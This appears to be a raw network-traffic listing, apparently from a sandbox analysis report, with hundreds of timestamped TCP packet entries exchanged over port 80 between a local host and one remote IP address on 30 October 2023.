                                                                                                                                                                                        Oct 30, 2023 14:17:49.904670000 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905106068 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905236006 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905316114 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905323029 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905428886 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905451059 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905524969 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905550003 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905627966 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905659914 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905760050 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905787945 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905849934 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905874968 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905976057 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905996084 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:49.906079054 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:49.906157970 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.209302902 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.209415913 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.209590912 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.209665060 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.209840059 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.209933996 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210009098 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210046053 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210119009 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210130930 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210196018 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210248947 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210329056 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210346937 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210445881 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210460901 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210534096 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210596085 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210649967 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210730076 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210777998 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210865974 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210902929 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.210988045 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211030006 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211097002 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211147070 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211204052 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211263895 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211308956 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211354017 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211429119 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211484909 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211534977 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211587906 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211649895 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211692095 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211766958 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211838007 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.211939096 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.515929937 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516050100 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516144037 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516155005 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516256094 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516314030 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516343117 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516438007 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516442060 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516519070 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516540051 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516633034 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516653061 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516726971 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516733885 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516807079 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516830921 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516921043 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.516962051 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517008066 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517029047 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517091036 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517115116 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517169952 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517216921 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517275095 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517301083 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517364979 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517398119 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517456055 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517492056 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517545938 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517606020 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517676115 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517707109 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517767906 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517788887 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517844915 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517889977 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517936945 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.517991066 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518040895 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518089056 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518145084 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518172979 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518249989 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518268108 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518357992 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518383026 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518440008 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518460035 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518521070 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518563986 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518611908 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518663883 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518734932 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518744946 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518831968 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518834114 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518897057 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518933058 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.518989086 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519032001 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519095898 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519119978 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519198895 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519217014 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519290924 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519314051 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519401073 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519433022 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519490957 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519505024 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519560099 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519613028 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519665956 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519710064 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519798994 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.519886017 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.824606895 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.824698925 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.824789047 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.824822903 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.824878931 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.824898958 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.824949980 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.825018883 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.825068951 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.825123072 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.825186014 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.825210094 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.825289965 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.825311899 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.825392008 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.825411081 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.825500011 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.825565100 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.825601101 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.825659037 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.825735092 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.825745106 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.825828075 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.825876951 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.825877905 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.826050043 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.826083899 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.826148033 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.826214075 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.826231956 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.826314926 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.826329947 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.826419115 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.826426029 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.826498985 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.826522112 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.826607943 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.826641083 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.826704979 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.826734066 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.826807022 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.826824903 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.826904058 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.826929092 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.826982975 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.827011108 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.827084064 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.827104092 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.827158928 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.827208042 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.827265024 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.827289104 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.827375889 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.827397108 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.827471972 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.827476025 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.827564001 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.827565908 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.827653885 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.827656984 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.827744007 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.827811003 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.827814102 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.827904940 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.827915907 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.827971935 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.828008890 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.828073025 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.828165054 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.828176022 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.828259945 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.828325033 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.828350067 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.828419924 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.828425884 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.828475952 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.828530073 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.828593016 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.828615904 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.828705072 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.828707933 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.828794956 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.828814983 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.828876019 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.828896999 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.828968048 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.828994989 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829082966 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829123020 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829173088 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829181910 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829266071 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829282045 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829344034 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829366922 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829449892 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829477072 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829549074 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829611063 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829612017 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829617023 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829642057 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829664946 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829684973 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829703093 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829720974 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829739094 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829756975 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829773903 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829788923 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829796076 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829821110 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829838037 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829838991 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829843044 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829868078 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829936981 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829936981 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829968929 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.829993010 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.830013037 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.830034018 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.830122948 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.830141068 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.830142021 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.830199003 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.830219984 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.830256939 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.830302000 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.830347061 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.830400944 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.830449104 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.830456018 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.830482006 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.830504894 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.830555916 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.830609083 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.830609083 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.830616951 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.830705881 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.830730915 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.830754995 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.830826044 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.830846071 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:50.830919981 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:50.831051111 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.130229950 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.130323887 CET8050093217.147.225.69192.168.11.20
                                                                                                                                                                                        Oct 30, 2023 14:17:51.130424976 CET5009380192.168.11.20217.147.225.69
                                                                                                                                                                                        Oct 30, 2023 14:17:51.130559921 CET5009380192.168.11.20217.147.225.69
